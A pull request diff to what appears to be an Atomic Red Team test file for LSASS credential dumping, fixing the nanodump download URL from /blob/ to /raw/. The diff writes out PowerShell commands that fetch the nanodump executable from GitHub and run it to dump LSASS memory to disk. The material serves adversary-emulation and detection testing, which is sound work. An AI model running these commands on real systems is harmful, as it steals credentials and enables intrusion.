### PR TITLE
Update T1003.001.yaml

### DIFF
--- a/atomics/T1003.001/T1003.001.yaml
+++ b/atomics/T1003.001/T1003.001.yaml
@@ -422,7 +422,7 @@ atomic_tests:
     get_prereq_command: |
       [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
       New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
-      Invoke-WebRequest "https://github.com/fortra/nanodump/blob/2c0b3d5d59c56714312131de9665defb98551c27/dist/nanodump.x64.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe"
+      Invoke-WebRequest "https://github.com/fortra/nanodump/raw/2c0b3d5d59c56714312131de9665defb98551c27/dist/nanodump.x64.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe"
   executor:
     command: |
       PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe --silent-process-exit "#{output_folder}"

--- a/atomics/T1003.001/T1003.001.yaml
+++ b/atomics/T1003.001/T1003.001.yaml
@@ -109,7 +109,7 @@ atomic_tests:
     get_prereq_command: |
       [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
       New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
-      Invoke-WebRequest "https://github.com/fortra/nanodump/blob/2c0b3d5d59c56714312131de9665defb98551c27/dist/nanodump.x64.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe" 
+      Invoke-WebRequest "https://github.com/fortra/nanodump/raw/2c0b3d5d59c56714312131de9665defb98551c27/dist/nanodump.x64.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe" 
   executor:
     command: |
       PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe -w "%temp%\nanodump.dmp"


### PR DESCRIPTION
**Details:**
Fixing download URL for nanodump to /raw/ instead of /blob/. Current version would download the GH webpage instead of the binary.

**Testing:**
Tested the IWR powershell commands and confirmed it works.